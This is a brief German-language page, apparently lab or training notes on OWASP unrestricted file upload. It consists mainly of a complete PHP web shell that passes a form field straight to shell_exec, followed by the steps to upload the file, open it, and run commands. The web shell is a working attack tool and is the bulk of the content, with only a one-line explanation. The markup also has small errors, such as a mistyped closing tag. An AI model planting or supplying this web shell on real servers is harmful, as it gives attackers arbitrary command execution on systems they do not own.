OWASP File Upload Kommando Ausführung
file.php
- Dieser PHP File so später Kommandos ausführen
<form action="" method="post" enctype="application/x-www-form-urlencoded"> <table style="margin-left:auto; margin-right:auto;"> <tr> <td colspan="2" style="text-align:center; font-weight: bold;color: #770000;"> Please enter system command </td> </tr> <tr><td> </td></tr> <tr> <td style="font-weight: bold;">Command</td> <td><input type="text" name="pCommand" size="50"></td> </tr> <tr><td> </td></tr> <tr> <td colspan="2" style="text-align:center;"> <input type="submit" value="Execute Command" /> </td> </tr> </table> </form> <?php if (isset($_REQUEST["pCommand"])) { echo "<nowiki><pre>"; echo shell_exec($_REQUEST["pCommand"]); echo "</pree>"; }//end if ?> </nowiki>
Upload File
Datei aufrufen
Kommando aufrufen
